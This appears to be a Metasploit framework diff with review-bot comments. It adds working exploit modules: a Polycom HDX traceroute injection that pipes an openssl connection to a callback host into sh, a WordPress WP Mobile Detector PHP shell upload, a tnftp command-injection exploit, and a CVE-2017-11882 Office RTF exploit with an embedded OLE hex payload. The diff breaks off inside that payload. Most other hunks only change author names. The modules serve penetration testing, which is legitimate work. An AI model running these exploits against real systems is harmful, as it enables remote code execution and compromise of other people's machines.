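Review bot: In `exploit`, the response from the `system_groupmanager.php` GET is dereferenced as `res.body` without a nil check, so a dropped connection surfaces as a `NoMethodError` instead of a clean failure; add `fail_with(Failure::UnexpectedReply, "#{peer} - No response from system_groupmanager.php") if res.nil?` before the CSRF regex. In `check`, calling `fail_with` on a missing or non-200 response raises out of the check rather than returning `Exploit::CheckCode::Unknown`, which is the contract callers of `check` expect. The "Invalid credentials" message used in both `login` and `check` is attached to an unauthenticated GET of `/index.php` where no credentials were sent, so "Unexpected response code" would describe the condition accurately, and `print_error("pfSens Version Not Detected...")` in `detect_version` has a typo for pfSense. The `return nil` after `fail_with` in `login` is unreachable and can be removed.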
--- a/modules/auxiliary/server/tnftp_savefile.rb +++ b/modules/exploits/unix/http/tnftp_savefile.rb @@ -3,7 +3,9 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class MetasploitModule < Msf::Auxiliary +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpServer include Msf::Auxiliary::Report @@ -32,22 +34,13 @@ class MetasploitModule < Msf::Auxiliary ], 'DisclosureDate' => 'Oct 28 2014', 'License' => MSF_LICENSE, - 'Actions' => [ - ['Service'] - ], - 'PassiveActions' => [ - 'Service' - ], - 'DefaultAction' => 'Service' + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => false, + 'Payload' => {'BadChars' => '/'}, + 'Targets' => [['ftp(1)', {}]], + 'DefaultTarget' => 0 )) - - register_options([ - OptString.new('CMD', [true, 'Command to run', 'uname -a']) - ]) - end - - def run - exploit end def on_request_uri(cli, request) @@ -59,7 +52,7 @@ class MetasploitModule < Msf::Auxiliary if request.uri.ends_with?(sploit) send_response(cli, '') - print_good("Executing `#{datastore['CMD']}'!") + print_good("Executing `#{payload.encoded}'!") report_vuln( :host => cli.peerhost, :name => self.name, @@ -79,6 +72,6 @@ class MetasploitModule < Msf::Auxiliary end def sploit - "|#{datastore['CMD']}" + "|#{payload.encoded}" end end diff --git a/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb new file mode 100644 index 0000000000..f95797d672 --- /dev/null +++ b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb 
@@ -0,0 +1,177 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Polycom Shell HDX Series Traceroute Command Execution', + 'Description' => %q{ + Within Polycom command shell, a command execution flaw exists in + lan traceroute, one of the dev commands, which allows for an + attacker to execute arbitrary payloads with telnet or openssl. + }, + 'Author' => [ + 'Mumbai', # + 'staaldraad', # https://twitter.com/_staaldraad/ + 'Paul Haas ', # took some of the code from polycom_hdx_auth_bypass + 'h00die ' # stole the code, creds to them + ], + 'References' => [ + ['URL', 'https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/'] + ], + 'DisclosureDate' => 'Nov 12 2017', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'Targets' => [[ 'Automatic', {} ]], + 'Payload' => { + 'Space' => 8000, + 'DisableNops' => true, + 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnet generic openssl'} + }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }, + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RHOST(), + Opt::RPORT(23), + OptString.new('PASSWORD', [ false, "Password to access console interface if required."]), + OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]), + OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ]) + ]) + end + + def check + connect + Rex.sleep(1) + res = sock.get_once + disconnect + if !res && !res.empty? 
+ return Exploit::CheckCode::Unknown + elsif res =~ /Welcome to ViewStation/ || res =~ /Polycom/ + return Exploit::CheckCode::Detected + end + Exploit::CheckCode::Unknown + end + + def exploit + unless check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - Failed to connect to target service") + end + + # + # Obtain banner information + # + sock = connect + Rex.sleep(2) + banner = sock.get_once + vprint_status("Received #{banner.length} bytes from service") + vprint_line("#{banner}") + if banner =~ /password/i + print_status("Authentication enabled on device, authenticating with target...") + if datastore['PASSWORD'].nil? + print_error("#{peer} - Please supply a password to authenticate with") + return + end + # couldnt find where to enable auth in web interface or telnet...but according to other module it exists..here in case. + sock.put("#{datastore['PASSWORD']}\n") + res = sock.get_once + if res =~ /Polycom/ + print_good("#{peer} - Authenticated successfully with target.") + elsif res =~ /failed/ + print_error("#{peer} - Invalid credentials for target.") + return + end + elsif banner =~ /Polycom/ # praise jesus + print_good("#{peer} - Device has no authentication, excellent!") + end + do_payload(sock) + end + + def do_payload(sock) + # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise + cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) + + # Start a listener + start_listener(true) + + # Figure out the port we picked + cbport = self.service.getsockname[2] + cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n" + sock.put(cmd) + if datastore['VERBOSE'] + Rex.sleep(2) + resp = sock.get_once + vprint_status("Received #{resp.length} bytes in response") + vprint_line(resp) + end + + # Give time for our command to be queued and executed + 1.upto(5) do + Rex.sleep(1) + break if session_created? 
+ end + end + + def stage_final_payload(cli) + print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") + cli.put(payload.encoded + "\n") + end + + def start_listener(ssl = false) + comm = datastore['ListenerComm'] + if comm == 'local' + comm = ::Rex::Socket::Comm::Local + else + comm = nil + end + + self.service = Rex::Socket::TcpServer.create( + 'LocalPort' => datastore['CBPORT'], + 'SSL' => ssl, + 'SSLCert' => datastore['SSLCert'], + 'Comm' => comm, + 'Context' => + { + 'Msf' => framework, + 'MsfExploit' => self + } + ) + + self.service.on_client_connect_proc = proc { |client| + stage_final_payload(client) + } + + # Start the listening service + self.service.start + end + + # Shut down any running services + def cleanup + super + if self.service + print_status("Shutting down payload stager listener...") + begin + self.service.deref if self.service.is_a?(Rex::Service) + if self.service.is_a?(Rex::Socket) + self.service.close + self.service.stop + end + self.service = nil + rescue ::Exception + end + end + end + + # Accessor for our TCP payload stager + attr_accessor :service +end diff --git a/modules/exploits/unix/misc/spamassassin_exec.rb b/modules/exploits/unix/misc/spamassassin_exec.rb index 607df7bbd9..0d661dd5cf 100644 --- a/modules/exploits/unix/misc/spamassassin_exec.rb +++ b/modules/exploits/unix/misc/spamassassin_exec.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote a malicious vpopmail User header, when running with vpopmail and paranoid modes enabled (non-default). Versions prior to v3.1.3 are vulnerable }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb index 37d60feb93..fd6bc72760 100644 --- a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb +++ b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb 
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote When implemented with black hole mode enabled, it is possible to execute commands remotely due to an insecure popen call. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb index 8d63607452..9a4342c20f 100644 --- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb +++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote present when AllowToUpdateStatsFromBrowser is enabled in the AWStats configuration file (non-default). }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/unix/webapp/awstatstotals_multisort.rb b/modules/exploits/unix/webapp/awstatstotals_multisort.rb index c338aa0e9f..c60655c7c4 100644 --- a/modules/exploits/unix/webapp/awstatstotals_multisort.rb +++ b/modules/exploits/unix/webapp/awstatstotals_multisort.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits an arbitrary command execution vulnerability in the AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/unix/webapp/dogfood_spell_exec.rb b/modules/exploits/unix/webapp/dogfood_spell_exec.rb index 351606a391..4c9a2a2821 100644 --- a/modules/exploits/unix/webapp/dogfood_spell_exec.rb +++ b/modules/exploits/unix/webapp/dogfood_spell_exec.rb 
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'LSO ', # Exploit module - 'patrick', # Added check code, QA tested ok 20090303, there are no references (yet). + 'aushack', # Added check code, QA tested ok 20090303, there are no references (yet). ], 'License' => BSD_LICENSE, 'References' => @@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote [ 'URL', 'http://downloads.sourceforge.net/dogfood/' ], ], 'Privileged' => false, - 'Platform' => ['unix'], # patrickw - removed win, linux -> untested + 'Platform' => ['unix'], # aushack - removed win, linux -> untested 'Arch' => ARCH_CMD, 'Payload' => { diff --git a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb index 8badd69c4e..6133669486 100644 --- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb +++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote weakness with non-default server configuration, it is possible to exploit this vulnerability successfully. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/unix/webapp/phpbb_highlight.rb b/modules/exploits/unix/webapp/phpbb_highlight.rb index 9b2b446dfa..a52dafb445 100644 --- a/modules/exploits/unix/webapp/phpbb_highlight.rb +++ b/modules/exploits/unix/webapp/phpbb_highlight.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote fixed in revision 5166. According to the "tags" within their tree, this corresponds to versions 2.0.4 through 2.0.15 (inclusive). }, - 'Author' => [ 'valsmith[at]metasploit.com', 'hdm', 'patrick' ], + 'Author' => [ 'valsmith[at]metasploit.com', 'hdm', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index abd6877ae3..46d974a838 100644 
--- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote vulnerability occurs within the blog comment functionality, allowing arbitrary files to be deleted. }, - 'Author' => [ 'Matteo Cantoni ', 'patrick' ], + 'Author' => [ 'Matteo Cantoni ', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/unix/webapp/wp_foxypress_upload.rb b/modules/exploits/unix/webapp/wp_foxypress_upload.rb index a1c4e6bed5..4cd4937c6e 100644 --- a/modules/exploits/unix/webapp/wp_foxypress_upload.rb +++ b/modules/exploits/unix/webapp/wp_foxypress_upload.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'Sammy FORGIT', # Vulnerability Discovery, PoC - 'patrick' # Metasploit module + 'aushack' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb new file mode 100644 index 0000000000..3355a7c067 --- /dev/null +++ b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb 
@@ -0,0 +1,108 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HTTP::Wordpress + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'WordPress WP Mobile Detector 3.5 Shell Upload', + 'Description' => %q{ + WP Mobile Detector Plugin for WordPress contains a flaw that allows a remote attacker + to execute arbitrary PHP code. This flaw exists because the + /wp-content/plugins/wp-mobile-detector/resize.php script does contains a + remote file include for files not cached by the system already. + By uploading a .php file, the remote system will + place the file in a user-accessible path. Making a direct request to the + uploaded file will allow the attacker to execute the script with the privileges + of the web server. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'pluginvulnerabilities.com', # Vulnerability disclosure + 'Aaditya Purani', # EDB module discovered after writing module + 'h00die' # Metasploit module + ], + 'References' => + [ + ['WPVDB', '8505'], + ['EDB', '39891'], + ['URL', 'https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/'] + ], + 'DisclosureDate' => 'May 31 2016', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['wp-mobile-detectory < 3.6', {}]], + 'DefaultTarget' => 0, + 'Stance' => Msf::Exploit::Stance::Aggressive + )) + end + + def check + check_plugin_version_from_readme('wp-mobile-detector', '3.5') + end + + def exploit + payload_name = rand_text_alphanumeric(10) + '.php' + + # First check to see if the file is written already, if it is cache wont retrieve it from us + res = send_request_cgi( + 'global' => true, + 'method' => 'GET', + 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache') + '/' + ) + if res && !res.body.include?(payload_name) + vprint_status("#{payload_name} verified as not written.") + else + fail_with(Failure::BadConfig,"#{payload_name} already written on system.") + end + + def on_request_uri(cli, _request) + print_good('Payload requested on server, sending') + send_response(cli, payload.encoded) + end + + print_status('Starting Payload Server') + start_service('Path' => "/#{payload_name}") + + print_status("Uploading payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php')}?src=#{get_uri}") + + res = send_request_cgi( + 'global' => true, + 'method' => 'GET', + 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php'), + 'vars_get' => {'src' => get_uri} + ) + + if res && res.code == 200 + print_good('Sleeping 5 seconds for payload upload') + register_files_for_cleanup(payload_name) + + Rex.sleep(5) + + print_status("Executing the payload via #{normalize_uri(wordpress_url_plugins, 
'wp-mobile-detector', 'cache', payload_name)}") + send_request_cgi( + { + 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name), + }) + # wait for callback, without this we exit too fast and miss our shell + Rex.sleep(2) + else + if res.nil? + fail_with(Failure::Unreachable, 'No response from the target') + else + vprint_error("HTTP Status: #{res.code}") + vprint_error("Server returned: #{res.body}") + fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') + end + end + end +end diff --git a/modules/exploits/windows/brightstor/discovery_tcp.rb b/modules/exploits/windows/brightstor/discovery_tcp.rb index 925be50971..576c41d779 100644 --- a/modules/exploits/windows/brightstor/discovery_tcp.rb +++ b/modules/exploits/windows/brightstor/discovery_tcp.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote This module is based on the 'cabrightstor_disco' exploit by HD Moore. }, - 'Author' => [ 'hdm', 'patrick' ], + 'Author' => [ 'hdm', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/brightstor/discovery_udp.rb b/modules/exploits/windows/brightstor/discovery_udp.rb index 924c992925..d376aca463 100644 --- a/modules/exploits/windows/brightstor/discovery_udp.rb +++ b/modules/exploits/windows/brightstor/discovery_udp.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote request is sent to UDP port 41524, triggering a stack buffer overflow. }, - 'Author' => [ 'hdm', 'patrick' ], + 'Author' => [ 'hdm', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/brightstor/message_engine.rb b/modules/exploits/windows/brightstor/message_engine.rb index 52190c0ef7..276210b36c 100644 --- a/modules/exploits/windows/brightstor/message_engine.rb +++ b/modules/exploits/windows/brightstor/message_engine.rb 
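Review bot: `def on_request_uri(cli, _request)` is defined inside the body of `exploit`, so the handler is re-defined on the class every time `exploit` runs; it uses only `cli` and `payload`, so move it out to a normal method at class level next to `check`. The cache pre-check reports `"#{payload_name} already written on system."` whenever `res` is nil, because the `if res && ...` condition folds "no response" into the else branch; add `fail_with(Failure::Unreachable, 'No response from the target') if res.nil?` before it so the two cases are distinguishable. There is a missing space after the comma in `fail_with(Failure::BadConfig,"...")`, and the target name `'wp-mobile-detectory < 3.6'` looks like a typo for `wp-mobile-detector`.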
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code. }, - 'Author' => [ 'MC', 'patrick' ], + 'Author' => [ 'MC', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/brightstor/tape_engine.rb b/modules/exploits/windows/brightstor/tape_engine.rb index 76ec8f5bf6..257710adf6 100644 --- a/modules/exploits/windows/brightstor/tape_engine.rb +++ b/modules/exploits/windows/brightstor/tape_engine.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. }, - 'Author' => [ 'MC', 'patrick' ], + 'Author' => [ 'MC', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/browser/barcode_ax49.rb b/modules/exploits/windows/browser/barcode_ax49.rb index 723d824519..40760859a6 100644 --- a/modules/exploits/windows/browser/barcode_ax49.rb +++ b/modules/exploits/windows/browser/barcode_ax49.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Trancek ', 'patrick' ], + 'Author' => [ 'Trancek ', 'aushack' ], 'References' => [ [ 'EDB', '4094' ], @@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0 English', { 'Ret' => 0x71ab7bfb } ] # jmp esp ws2_32.dll patrickw xpsp0 + [ 'Windows XP SP0 English', { 'Ret' => 0x71ab7bfb } ] # jmp esp ws2_32.dll aushack xpsp0 ], 'DisclosureDate' => 'Jun 22 2007', 'DefaultTarget' => 0)) diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb index 44bfe234e5..d991c1f2fb 100644 
--- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb +++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb @@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - # Tested ok patrickw 20090303 + # Tested ok aushack 20090303 [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ], ], 'DisclosureDate' => 'Jun 6 2007', diff --git a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb index 9792488ea9..8dad48f088 100644 --- a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb +++ b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote is overwritten. }, 'License' => MSF_LICENSE, - 'Author' => 'patrick', + 'Author' => 'aushack', 'References' => [ [ 'CVE', '2006-2086' ], diff --git a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb index 96b65bd1db..aa87e926cc 100644 --- a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb +++ b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => 'patrick', + 'Author' => 'aushack', 'References' => [ [ 'CVE', '2008-1724' ], diff --git a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb index c3ff5b9188..76ccd754cc 100644 --- a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb +++ b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote SEH can be overwritten. }, 'License' => MSF_LICENSE, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ [ 'CVE', '2007-3314' ], 
diff --git a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb index 7d9eca857b..ca7da918ed 100644 --- a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb +++ b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb @@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - # Tested ok patrickw 20090503 + # Tested ok aushack 20090503 [ 'Windows XP SP2 English', { 'Ret' => 0x7c82385d } ], #call esp [ 'Windows XP SP0/1 English', { 'Ret' => 0x71ab7bfb } ], #jmp esp [ 'Windows XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], #jmp esp diff --git a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb index a91c80694e..9651e72307 100644 --- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb +++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb @@ -47,7 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'process' + 'EXITFUNC' => 'process', + 'DisablePayloadHandler' => true }, 'Arch' => [ARCH_X86, ARCH_X64], 'Payload' => @@ -76,7 +77,6 @@ class MetasploitModule < Msf::Exploit::Remote register_advanced_options( [ - OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]), OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player']) ] diff --git a/modules/exploits/windows/fileformat/destinymediaplayer16.rb b/modules/exploits/windows/fileformat/destinymediaplayer16.rb index aa3f6a2b21..5a9eccf641 100644 --- a/modules/exploits/windows/fileformat/destinymediaplayer16.rb +++ b/modules/exploits/windows/fileformat/destinymediaplayer16.rb 
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - # Tested ok patrickw 20090503 + # Tested ok aushack 20090503 [ 'Destiny Universal', { 'Ret' => 0x00bf9d4d } ], #jmp esp Destiny.exe [ 'Windows XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], #jmp esp ], diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb new file mode 100644 index 0000000000..ec5b951c8d --- /dev/null +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb 
@@ -0,0 +1,315 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::Powershell + include Msf::Exploit::EXE + include Msf::Exploit::FILEFORMAT + + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Office CVE-2017-11882', + 'Description' => %q{ + Module exploits a flaw in how the Equation Editor that + allows an attacker to execute arbitrary code in RTF files without + interaction. The vulnerability is caused by the Equation Editor, + to which fails to properly handle OLE objects in memory. + }, + 'Author' => ['mumbai', 'embedi'], + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'Nov 15 2017', + 'References' => [ + ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'], + ['URL', 'https://github.com/embedi/CVE-2017-11882'] + ], + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => [ + ['Microsoft Office', {} ], + ], + 'DefaultTarget' => 0, + 'Payload' => { + 'DisableNops' => true + }, + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'DefaultOptions' => { + 'EXITFUNC' => 'thread', + 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' + } + )) + + register_options([ + OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]), + OptString.new("FOLDER_PATH", [false, "Path to file to inject", nil]) + ]) + end + + def retrieve_header(filename) + if (not datastore['FOLDER_PATH'].nil?) + path = "#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}" + else + path = nil + end + if (not path.nil?) + if ::File.file?(path) + File.open(path, 'rb') do |fd| + header = fd.read(fd.stat.size).split('{\*\datastore').first + header = header.to_s # otherwise I get nil class... 
+ print_status("Injecting #{path}...") + return header + end + else + header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" + header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" + header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' + end + else + header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" + header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" + header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' + end + return header + end + + + + def generate_rtf + header = retrieve_header(datastore['FILENAME']) + object_class = '{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata ' + object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000' + object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff' + object_class << '09000600000000000000000000000100000001000000000000000010000002000' + object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040' + object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0' + object_class << '07400720079000000000000000000000000000000000000000000000000000000' + object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000' + object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce' + object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000' + object_class << 
